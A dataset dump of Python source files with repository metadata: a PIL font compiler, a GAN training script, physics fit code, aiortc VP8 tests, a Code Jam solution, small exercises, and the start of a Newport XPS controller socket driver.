blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
467737aa13e6224c2b5459fae510519622e05c84 | b4c11d69197ef90dcacc8e34884036e4f576855e | /Python/myEnvironment/djangoEnv/bin/pilfont.py | 146697b69ee3a1e8db89379b57baf96f2fd4437e | [] | no_license | VT-Zhang/PYTHON_Platform_Works | c6314715e207995cce0244c38c8d48f95cf934b8 | 52654ef0ecf9102bfe378540818ebbb2dc27a134 | refs/heads/master | 2021-06-15T02:22:03.868898 | 2017-03-07T16:20:26 | 2017-03-07T16:20:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,085 | py | #!/Users/jianzhang/Dropbox/Dojo/Python/myEnvironment/djangoEnv/bin/python2.7
#
# The Python Imaging Library
# $Id$
#
# PIL raster font compiler
#
# history:
# 1997-08-25 fl created
# 2002-03-10 fl use "from PIL import"
#
from __future__ import print_function
import glob
import sys
# drivers
from PIL import BdfFontFile
from PIL import PcfFontFile
VERSION = "0.4"

# Without arguments: print the usage banner and exit with an error code.
if len(sys.argv) <= 1:
    print("PILFONT", VERSION, "-- PIL font compiler.")
    print()
    print("Usage: pilfont fontfiles...")
    print()
    print("Convert given font files to the PIL raster font format.")
    print("This version of pilfont supports X BDF and PCF fonts.")
    sys.exit(1)

# Expand every command-line argument as a glob pattern into a flat list.
files = []
for pattern in sys.argv[1:]:
    files.extend(glob.glob(pattern))

# Compile each font file, reporting OK/failed per file.
for fontfile in files:
    print(fontfile + "...", end=' ')
    try:
        fp = open(fontfile, "rb")
        try:
            # Try PCF first; a SyntaxError means "not a PCF file".
            font = PcfFontFile.PcfFontFile(fp)
        except SyntaxError:
            fp.seek(0)
            font = BdfFontFile.BdfFontFile(fp)
        font.save(fontfile)
    except (SyntaxError, IOError):
        print("failed")
    else:
        print("OK")
| [
"[email protected]"
] | |
dcebc6b36fed20d92041c019092864c956b743da | e6ebd1f9e3968f6ed613e9f35e46716115e6e9c3 | /chapter3/demo1.py | fdb50467279d444e9033ffd2743c6fed6e6e300c | [] | no_license | huwanping001/Python | 897046d3d6d1b420befeefcaa2b9544efa7d1881 | 3c76278f7a9b216b28b8880e0108af3c550b9372 | refs/heads/main | 2023-08-21T00:45:17.991833 | 2021-10-18T13:47:52 | 2021-10-18T13:47:52 | 409,586,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | # 学校:四川轻化工大学
# College: Automation & Information Engineering ("自信学院")
# Student: Hu Wanping
# Created: 2021/9/17 19:36
# Prompt asks (in Chinese): "What present does Xiao Hu want?"
present= input('小胡想要什么礼物呢?')
# input() always returns str in Python 3, so type(present) is <class 'str'>
print(present,type(present))
| [
"[email protected]"
] | |
5160df22bf339592d41b4ff90b972fa65bcbcd93 | 773c02448ad1766270583cadcbb5c2c71347efd2 | /T2_img2latent.py | 0a200f93eb514a9c131e57b12e6605ca580d353a | [] | no_license | thoppe/SyntheticCountenance | b4640c8009ba5bc2377a11aac88cc1be75d7b92c | c06e186fb0596a50d9080b38b80d81c58f2bdde4 | refs/heads/master | 2020-04-14T19:36:12.431157 | 2019-02-02T22:05:20 | 2019-02-02T22:05:20 | 164,064,092 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | """
The idea is to find the img such that D(img) is minimized, that is the picture
that _most_ fools the discriminator.
"""
import numpy as np
import os, json, glob, random, h5py
from tqdm import tqdm
import tensorflow as tf
from src.GAN_model import GAN_output_to_RGB, RGB_to_GAN_output
from src.img2latent import Image2Latent
def image_pipeline(batch_size=5):
    """Yield endless (latent, image) training batches from the HDF5 sample set.

    Each batch is a tuple (Z[idx], img) where idx are `batch_size` random
    row indices and img has been converted to the GAN's output space.

    Fix: the original exited the `with` block before the sampling loop, so
    h5py had already closed the file when h5['IMG'] was first read, raising
    on the first iteration.  The loop must run while the file is open.
    """
    f_h5 = 'samples/PGAN_small_images.h5'
    with h5py.File(f_h5, 'r') as h5:
        N = len(h5['Z'])
        Z = h5['Z'][...]
        # Stay inside the `with`: h5['IMG'] is read lazily on every pass.
        while True:
            idx = np.random.randint(0, N, size=batch_size)
            img = np.array([h5['IMG'][i] for i in idx])
            img = RGB_to_GAN_output(img, batch_size=batch_size, resize=False)
            yield Z[idx], img
if __name__ == "__main__":
    batch_size = 32
    n_epochs = 2000  # NOTE(review): defined but never used below
    n_save_every = 50  # render a sample every 50 training batches
    ITR = image_pipeline(batch_size)
    clf = Image2Latent(batch_size=batch_size)
    # Train indefinitely; image_pipeline is an endless generator.
    while True:
        for n, (z,img) in enumerate(ITR):
            if n%n_save_every == 0:
                clf.render(z, img)
                #s = clf.save()
            lx = clf.train(z, img)
            print(n, lx)
| [
"[email protected]"
] | |
c639300afde098f8880ea4f170b16a2aa369d28c | 0f90bc3f68e674b2a71d940167b9d5702d18d8ba | /finalProject/env/lib/python3.6/abc.py | d3583e61a4a85959762a2d51fc07cc3be07470ea | [] | no_license | pondjames007/DetourningTheWeb | a0f0d730365097b2233c2b9e6ccac0bcc7c113e4 | 49aea061bea449b016eb7b35ff5489c35654dd28 | refs/heads/master | 2021-05-04T05:40:39.881902 | 2018-04-23T20:44:43 | 2018-04-23T20:44:43 | 120,343,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | /Users/pondjames007/anaconda3/lib/python3.6/abc.py | [
"[email protected]"
] | |
83c5bdc03f15bf3062de8e162dc37d0640411c79 | 71c7683331a9037fda7254b3a7b1ffddd6a4c4c8 | /Phys/BsKstKst/python/BsKstKst/FitMassAngles/Param_Diego/for_Juan.py | c5a03c629416915abae29c06369469f6b4fd23be | [] | no_license | pseyfert-cern-gitlab-backup/Urania | edc58ba4271089e55900f8bb4a5909e9e9c12d35 | 1b1c353ed5f1b45b3605990f60f49881b9785efd | refs/heads/master | 2021-05-18T13:33:22.732970 | 2017-12-15T14:42:04 | 2017-12-15T14:42:04 | 251,259,622 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,717 | py | from ROOT import *
from math import *
from array import *
from Urania import PDG
from Urania.Helicity import *
from Urania import RooInterfaces as D
# Generate the pdf using the tools in Urania.Helicity
A = doB2VX([0,1,2], helicities = [0], transAmp = 1)#0)
### masage a bit the expression to make it more suitable for fitting
pdf_split = DecomposeAmplitudes(A,TransAmplitudes.values())#H.values())
# Collect the Re/Im cross terms of every amplitude with A_perp (except the
# S-wave A_s); the loop building `phys` below skips exactly these keys.
pdf_delete = {}
ape = TransAmplitudes["1_pe"]
a_s = TransAmplitudes["0_0"]
for ak in TransAmplitudes.values():
    if ape==ak: continue
    if a_s==ak: continue
    _re, _im = TermsAsReImag(A,ak,ape)
    pdf_delete[re(ak*ape.conjugate())]=_re
    pdf_delete[im(ak*ape.conjugate())]=_im
    pdf_delete[re(ape*ak.conjugate())]=_re
    pdf_delete[im(ape*ak.conjugate())]=_im
# Assemble the physical PDF, dropping the interference terms gathered above.
phys = 0
for key in pdf_split:
    if key in pdf_delete.keys():
        print "deleting ",key
        continue
    phys += StrongPhases(key)*pdf_split[key]
### change the free variables to cosines
x = Symbol("helcosthetaK",real = True)
y = Symbol("helcosthetaL", real = True)
z = Symbol("helphi", real = True)
CThL = Cos(ThetaL)
CThK = Cos(ThetaK)
def changeFreeVars(function):
    """Rewrite the angular PDF in terms of the fit observables.

    Double angles are expanded first, sines are then replaced by
    sqrt(1 - cos^2), and finally the symbolic angles are renamed to the
    helicity-frame observables (helcosthetaK, helcosthetaL, helphi).
    """
    # Order matters: each rule must be applied before the next can match.
    rewrite_rules = [
        (Sin(2*ThetaK), 2*Sin(ThetaK)*Cos(ThetaK)),
        (Cos(2*ThetaK), Cos(ThetaK)**2 - Sin(ThetaK)**2),
        (Sin(2*ThetaL), 2*Sin(ThetaL)*Cos(ThetaL)),
        (Cos(2*ThetaL), Cos(ThetaL)**2 - Sin(ThetaL)**2),
        (Sin(ThetaK), Sqrt(1-Cos(ThetaK)**2)),
        (Sin(ThetaL), Sqrt(1-Cos(ThetaL)**2)),
    ]
    for old_expr, new_expr in rewrite_rules:
        function = function.subs(old_expr, new_expr)
    return function.subs([(CThK,x),(CThL,y), (Phi,z)])
func = changeFreeVars(phys)
# Acceptance parameterisation: 5th-order polynomials in each cosine, with
# the last coefficient (c5) constrained so that acc(1) equals y_thN.
c1_th1 = Symbol("c1th1",real=True)
c2_th1 = Symbol("c2th1",real=True)
c3_th1 = Symbol("c3th1",real=True)
c4_th1 = Symbol("c4th1",real=True)
y_th1 = Symbol("yth1",real=True)
c1_th2 = Symbol("c1th2",real=True)
c2_th2 = Symbol("c2th2",real=True)
c3_th2 = Symbol("c3th2",real=True)
c4_th2 = Symbol("c4th2",real=True)
y_th2 = Symbol("yth2",real=True)
acc_coefs = [c1_th1,c2_th1,c3_th1,c4_th1,y_th1,c1_th2,c2_th2,c3_th2,c4_th2,y_th2]
c5_th1 = y_th1-(1+c1_th1+c2_th1+c3_th1+c4_th1)
c5_th2 = y_th2-(1+c1_th2+c2_th2+c3_th2+c4_th2)
acc1 = 1 + c1_th1*x + c2_th1*x*x + c3_th1*x*x*x + c4_th1*x*x*x*x + c5_th1*x*x*x*x*x
acc2 = 1 + c1_th2*y + c2_th2*y*y + c3_th2*y*y*y + c4_th2*y*y*y*y + c5_th2*y*y*y*y*y
# func = func*acc1*acc2
##### Generate and compile a fitting class corresponding to "func"
### Trial 1, w/o analytical integrals
op = D.RooClassGenerator(func*acc1*acc2, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"AngularPDFAcc_2011")
# op = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values(),"AngularPDFNoAcc")
op.makePdf(integrable = kTRUE) ## You can also use makeFunc to generate just a RooAbsReal. Still not tested though
# Register the analytical integrals over every combination of observables.
op.doIntegral(1,(x,-1,1))
op.doIntegral(2,(y,-1,1))
op.doIntegral(3,(z,-Pi,Pi))
op.doIntegral(4,(x,-1,1),(y,-1,1))
op.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
op.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
op.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
op.overwrite()
### Trial 2, now lets generate a version using analytical integrals
# op2 = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"RooSecond")
# op2.makePdf(integrable = kTRUE)
# op2.doIntegral(1,(x,-1,1))
# op2.doIntegral(2,(y,-1,1))
# op2.doIntegral(3,(z,-Pi,Pi))
# op2.doIntegral(4,(x,-1,1),(y,-1,1))
# op2.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
# op2.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
# op2.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
# op2.overwrite()
### Compile online the two models and load the class to python
op.invoke()#, op2.invoke()
# NOTE: 'BREAK' is undefined on purpose -- it raises NameError and stops the
# script here after class generation; nothing below runs in this state.
BREAK
gROOT.ProcessLine(".x RooSecond.cxx+")
############## MAKING TREE
plot = 1
label = 'PLOT'
f = TFile("${WHOME}/NTuples_Bs2KstKst_strip17/public/Bs2KstKst_generated_MC11_angles.root")
tree=f.Get("T")
f1=TFile("/tmp/trash.root","recreate")
tree1 = tree.CopyTree("1")
tree2 = tree.CopyTree("1")
################### CONSTRUCTING THE MODEL
CThetaL = RooRealVar("CosTheta1","cos(ThetaL) ", -1,1)
CThetaK = RooRealVar("CosTheta2","cos(ThetaK) ", -1,1)
Phi = RooRealVar("Phi","Phi", -pi,pi)
A0 = RooRealVar("A0","A0",0.77,0.5,1.)
Apa = RooRealVar("Apa","Apa",0.5,0.3,1.)
# NOTE(review): under Python 2, 1/2 is integer division, so As starts at 0.
As = RooRealVar("As" ,"As" ,1/2,0.,1.)
Ape = RooFormulaVar("Ape","Ape","sqrt(1-As*As-Apa*Apa-A0*A0)",RooArgList(A0,As,Apa))
deltaPa = RooRealVar("deltaPa","deltaPa",2.501,0.,2*pi)
deltaPe = RooRealVar("deltaPe","deltaPe",0.)#1, -pi,pi)
deltaS = RooRealVar("deltaS" ,"deltaS" ,0.9,0.,2*pi)
model=RooFirst("model","model",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPe,deltaS)
# model2=RooSecond("model2","model2",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPepi,deltaS)
################### FITTING DATA
###  tree  - mix of B & Bbar
### tree1  - K+
### tree2  - K-
data = RooDataSet(label, label,tree1,RooArgSet(CThetaL,CThetaK,Phi))
#data = model.generate(RooArgSet(CThetaL,CThetaK,Phi),100000) ;
# Freeze the S-wave component for this fit.
As.setVal(0)
As.setConstant(kTRUE)
deltaS.setConstant(kTRUE)
#deltaPe.setConstant(kTRUE)
def test(model,cv):
    """Fit `model` to the global `data` set (with Minos errors) and draw
    the three angular projections on pads 1-3 of canvas `cv`.

    Returns (fitResult, cosThetaK frame, cosThetaL frame, phi frame).
    Keep the frames referenced by the caller, otherwise ROOT deletes the
    plots when they are garbage collected.
    """
    res = model.fitTo(data,RooFit.Minos(kTRUE))#, RooFit.Range("REDUCED"))
    cv.Divide(2,2)
    cv.cd(1)
    Angframe = CThetaK.frame()
    data.plotOn(Angframe)
    model.plotOn(Angframe)
    Angframe.Draw()
    cv.cd(2)
    Angframeb = CThetaL.frame()
    data.plotOn(Angframeb)
    model.plotOn(Angframeb)
    Angframeb.Draw()
    cv.cd(3)
    Angframec = Phi.frame()
    data.plotOn(Angframec)
    model.plotOn(Angframec)
    Angframec.Draw()
    return res, Angframe, Angframeb, Angframec
# Run the fit on the K+ sample; keep the returned frames referenced so the
# drawn plots survive.  (Unreachable while the BREAK above is in place.)
cv = TCanvas()
w_1 = test(model,cv)
# w_2 = test(model2)
################ DRAWING
| [
"[email protected]"
] | |
c48e575ae1fb8a2c929db8e5ce19ddf8a1db5e42 | 989b3499948137f57f14be8b2c77d0610d5975e6 | /python-package/daily_study/python/question_python(resolved)/chapter4_conditional_and_loops(완결)/iii_five_seven.py | 978209ab4157d0feb585ee846dc3b32fb9719737 | [] | no_license | namkiseung/python_BasicProject | 76b4c070934ad4cb9d16ce844efa05f64fb09ac0 | 460d05248b2d1431624aba960e28bece888643e4 | refs/heads/master | 2022-12-13T21:12:06.865241 | 2020-04-23T01:30:08 | 2020-04-23T01:30:08 | 142,980,920 | 1 | 1 | null | 2022-12-08T02:27:40 | 2018-07-31T07:49:17 | Python | UTF-8 | Python | false | false | 838 | py | # -*- coding: utf-8 -*-
def five_seven(x, y):
    """Return a comma-separated string of the numbers in [x, y] (both
    bounds included) that are divisible by both 7 and 5.

    sample in/out:
    five_seven(1500, 1600) -> "1505, 1540, 1575"
    five_seven(1500, 1700) -> "1505, 1540, 1575, 1610, 1645, 1680"

    Fix: the original only printed matches, overwrote `result` with a
    tuple each time, and always returned the literal 'success' instead of
    the required string.
    """
    # Divisible by both 5 and 7 <=> divisible by 35.
    return ", ".join(str(num) for num in range(x, y + 1) if num % 35 == 0)
return 'success'
if __name__ == "__main__":
    # Quick manual check (Python 2 print statements).
    print five_seven(1500, 1600)
    print five_seven(1500, 1700)
    pass
| [
"[email protected]"
] | |
0ac4e38308fb4ff518727b8ee1195fa098b9eb57 | 9a94357b2cc45b1e6a56c5c309fad0f717e96b2b | /tests/test_vpx.py | 108360a809ec883ab5d5c6b8521ffbd7c1e719a3 | [
"BSD-3-Clause"
] | permissive | gitter-badger/aiortc | 34099aee833a56d36f53b74336a2e7344d274cf3 | 0417b6b9c75dd4fc9f049ddeda7f09f306318574 | refs/heads/master | 2020-03-30T11:22:22.704701 | 2018-10-01T12:49:46 | 2018-10-01T13:16:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,489 | py | from unittest import TestCase
from aiortc.codecs import get_decoder, get_encoder
from aiortc.codecs.vpx import (Vp8Decoder, Vp8Encoder, VpxPayloadDescriptor,
_vpx_assert, number_of_threads)
from aiortc.mediastreams import VIDEO_TIME_BASE, VideoFrame
from aiortc.rtcrtpparameters import RTCRtpCodecParameters
from .codecs import CodecTestCase
# 90 kHz is the standard RTP clock rate for video payloads.
VP8_CODEC = RTCRtpCodecParameters(name='VP8', clockRate=90000)
class VpxPayloadDescriptorTest(TestCase):
    """Parse/serialise round-trips for the VP8 RTP payload descriptor.

    Byte fixtures follow RFC 7741; each test checks the parsed fields,
    the re-serialised bytes and the unconsumed remainder.
    """
    def test_no_picture_id(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x10')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, None)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x10')
        self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=None)')
        self.assertEqual(rest, b'')
    def test_short_picture_id_17(self):
        """
        From RFC 7741 - 4.6.3
        """
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x11')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 17)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x80\x11')
        self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=17)')
        self.assertEqual(rest, b'')
    def test_short_picture_id_127(self):
        # 127 is the largest picture id that fits the one-byte form.
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x7f')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 127)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x80\x7f')
        self.assertEqual(rest, b'')
    def test_long_picture_id_128(self):
        # 128 is the smallest picture id requiring the two-byte form.
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x80\x80')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 128)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x80\x80\x80')
        self.assertEqual(rest, b'')
    def test_long_picture_id_4711(self):
        """
        From RFC 7741 - 4.6.5
        """
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x92\x67')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 4711)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x80\x92\x67')
        self.assertEqual(rest, b'')
    def test_tl0picidx(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\xc0\x92\x67\x81')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, 4711)
        self.assertEqual(descr.tl0picidx, 129)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\xc0\x92\x67\x81')
        self.assertEqual(rest, b'')
    def test_tid(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x20\xe0')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, None)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, (3, 1))
        self.assertEqual(descr.keyidx, None)
        self.assertEqual(bytes(descr), b'\x90\x20\xe0')
        self.assertEqual(rest, b'')
    def test_keyidx(self):
        descr, rest = VpxPayloadDescriptor.parse(b'\x90\x10\x1f')
        self.assertEqual(descr.partition_start, 1)
        self.assertEqual(descr.partition_id, 0)
        self.assertEqual(descr.picture_id, None)
        self.assertEqual(descr.tl0picidx, None)
        self.assertEqual(descr.tid, None)
        self.assertEqual(descr.keyidx, 31)
        self.assertEqual(bytes(descr), b'\x90\x10\x1f')
        self.assertEqual(rest, b'')
class Vp8Test(CodecTestCase):
    """End-to-end tests of the VP8 encoder/decoder wrappers: codec lookup,
    payload packetisation limits (1300-byte MTU), keyframe behaviour,
    thread heuristics and encode/decode round-trips at several sizes."""
    def test_assert(self):
        with self.assertRaises(Exception) as cm:
            _vpx_assert(1)
        self.assertEqual(str(cm.exception), 'libvpx error: Unspecified internal error')
    def test_decoder(self):
        decoder = get_decoder(VP8_CODEC)
        self.assertTrue(isinstance(decoder, Vp8Decoder))
    def test_encoder(self):
        encoder = get_encoder(VP8_CODEC)
        self.assertTrue(isinstance(encoder, Vp8Encoder))
        frame = VideoFrame(width=640, height=480)
        frame.pts = 0
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame)
        self.assertEqual(len(payloads), 1)
        self.assertTrue(len(payloads[0]) < 1300)
        self.assertEqual(timestamp, 0)
        # change resolution
        frame = VideoFrame(width=320, height=240)
        frame.pts = 3000
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame)
        self.assertEqual(len(payloads), 1)
        self.assertTrue(len(payloads[0]) < 1300)
        self.assertEqual(timestamp, 3000)
    def test_encoder_large(self):
        encoder = get_encoder(VP8_CODEC)
        self.assertTrue(isinstance(encoder, Vp8Encoder))
        # first keyframe
        frame = VideoFrame(width=2560, height=1920)
        frame.pts = 0
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame)
        self.assertEqual(len(payloads), 7)
        self.assertEqual(len(payloads[0]), 1300)
        self.assertEqual(timestamp, 0)
        # delta frame
        frame = VideoFrame(width=2560, height=1920)
        frame.pts = 3000
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame)
        self.assertEqual(len(payloads), 1)
        self.assertTrue(len(payloads[0]) < 1300)
        self.assertEqual(timestamp, 3000)
        # force keyframe
        frame = VideoFrame(width=2560, height=1920)
        frame.pts = 6000
        frame.time_base = VIDEO_TIME_BASE
        payloads, timestamp = encoder.encode(frame, force_keyframe=True)
        self.assertEqual(len(payloads), 7)
        self.assertEqual(len(payloads[0]), 1300)
        self.assertEqual(timestamp, 6000)
    def test_number_of_threads(self):
        self.assertEqual(number_of_threads(1920 * 1080, 16), 8)
        self.assertEqual(number_of_threads(1920 * 1080, 8), 3)
        self.assertEqual(number_of_threads(1920 * 1080, 4), 2)
        self.assertEqual(number_of_threads(1920 * 1080, 2), 1)
    def test_roundtrip_1280_720(self):
        self.roundtrip_video(VP8_CODEC, 1280, 720)
    def test_roundtrip_960_540(self):
        self.roundtrip_video(VP8_CODEC, 960, 540)
    def test_roundtrip_640_480(self):
        self.roundtrip_video(VP8_CODEC, 640, 480)
    def test_roundtrip_320_240(self):
        self.roundtrip_video(VP8_CODEC, 320, 240)
| [
"[email protected]"
] | |
b2e1e547eb7cb40072a470450961ec3ea2a10584 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_118/652.py | 4beb500f3c8a4122fb591a82efec72a0653e53da | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py |
n = int(raw_input())
for c in range(n):
(A,B) = (int(r) for r in raw_input().split(' '))
L = len(str(B))
ans = []
out = 0
# The odd ones out
for v in (1,4,9):
if A <= v <= B:
ans.append(v)
out += 1
# Twos
for d in range(L/2+2):
s = '2'+'0'*d+'2'
sq = int(s)**2
#print s,sq
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
for d in range(L/4+2):
s = '2'+'0'*d+'1'+'0'*d+'2'
sq = int(s)**2
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
# Binary
p = [0,0,0,0,0]
beg = set()
for p[0] in range(L/4+2):
for p[1] in range(min(p[0],L/4+1),L/4+2):
for p[2] in range(min(p[1],L/4+1),L/4+2):
for p[3] in range(min(p[2],L/4+1),L/4+2):
for p[4] in range(min(p[3],L/4+1),L/4+2):
s = ['0'] * (L/4+1)
for pos in range(5):
if p[pos] < (L/4+1): s[p[pos]] = '1'
a = ''.join(s)
a = a[(a+'1').find('1'):]
beg.add(a)
for b in beg:
if b:
if sum([int(u) for u in b]) >= 5: continue
rev = [b+b[::-1],b+'0'+b[::-1],b+'1'+b[::-1],b+'2'+b[::-1]]
for v in rev:
v2 = int(v)**2
s = str(v2)
if A <= v2 <= B and s == s[::-1]: out += 1
if A <= v2 <= B and s == s[::-1]: ans.append(v2)
print "Case #%d: %d" % (c+1,out)
#y = len(list(set(range(A,B+1)).intersection(set([1,4,9,121,484]))))
#print A,B, ans
| [
"[email protected]"
] | |
a0ab6ad9437802c9e710e2446a34b6e0e6f0927f | 298e100a601f3edcc4b9c8dd465d934554b87065 | /config/XPS/xps_config_oct2010/XPS_C8_drivers.py | 694dd48501e6ca5bf579217deeb004b6ff834df9 | [] | no_license | newville/xrmcollect | 27bc673d1a1e0cd6ab928e27fd4964e7ca5eddd4 | f479e8812a244d478b456dab942506892180f17d | refs/heads/master | 2023-08-24T17:57:38.090068 | 2016-05-11T21:32:15 | 2016-05-11T21:32:15 | 1,025,945 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 109,311 | py | # XPS Python class
#
# for XPS-C8 Firmware V2.6.x
#
# See Programmer's manual for more information on XPS function calls
import socket
class XPS:
    """Python wrapper for the Newport XPS-C8 motion controller TCP/IP
    command interface (firmware V2.6.x).

    Most methods send one ASCII command over an open socket and return
    [errorCode, returnedString]; methods that parse values out of the
    reply append them after the error code.  Methods silently return
    None when called with a socketId that is not in use.
    """
    # Defines
    MAX_NB_SOCKETS = 100  # hard limit on simultaneous controller connections
    # Global variables (shared by every XPS instance)
    __sockets = {}  # socketId -> connected socket object
    __usedSockets = {}  # socketId -> 1 while the slot is in use, else 0
    __nbSockets = 0  # count of currently open sockets
    # Initialization Function
    def __init__ (self):
        """Mark every socket slot as free (resets the shared slot table)."""
        XPS.__nbSockets = 0
        for socketId in range(self.MAX_NB_SOCKETS):
            XPS.__usedSockets[socketId] = 0
# Send command and get return
def __sendAndReceive (self, socketId, command):
try:
XPS.__sockets[socketId].send(command)
ret = XPS.__sockets[socketId].recv(1024)
while (ret.find(',EndOfAPI') == -1):
ret += XPS.__sockets[socketId].recv(1024)
except socket.timeout:
return [-2, '']
except socket.error (errNb, errString):
print 'Socket error : ' + errString
return [-2, '']
for i in range(len(ret)):
if (ret[i] == ','):
return [int(ret[0:i]), ret[i+1:-9]]
# TCP_ConnectToServer
def TCP_ConnectToServer (self, IP, port, timeOut):
socketId = 0
if (XPS.__nbSockets < self.MAX_NB_SOCKETS):
while (XPS.__usedSockets[socketId] == 1 and socketId < self.MAX_NB_SOCKETS):
socketId += 1
if (socketId == self.MAX_NB_SOCKETS):
return -1
else:
return -1
XPS.__usedSockets[socketId] = 1
XPS.__nbSockets += 1
try:
XPS.__sockets[socketId] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
XPS.__sockets[socketId].connect((IP, port))
XPS.__sockets[socketId].settimeout(timeOut)
XPS.__sockets[socketId].setblocking(1)
except socket.error:
return -1
return socketId
    # TCP_SetTimeout
    def TCP_SetTimeout (self, socketId, timeOut):
        """Change the receive timeout (seconds) of an open socket; no-op if
        the slot is not in use."""
        if (XPS.__usedSockets[socketId] == 1):
            XPS.__sockets[socketId].settimeout(timeOut)
    # TCP_CloseSocket
    def TCP_CloseSocket (self, socketId):
        """Close a socket and release its slot; socket errors are ignored."""
        if (socketId >= 0 and socketId < self.MAX_NB_SOCKETS):
            try:
                XPS.__sockets[socketId].close()
                XPS.__usedSockets[socketId] = 0
                XPS.__nbSockets -= 1
            except socket.error:
                pass
    # GetLibraryVersion
    def GetLibraryVersion (self):
        """Return the driver version string (no controller round-trip)."""
        return ['XPS-C8 Firmware V2.6.x Beta 19']
    # ControllerMotionKernelTimeLoadGet : Get controller motion kernel time load
    def ControllerMotionKernelTimeLoadGet (self, socketId):
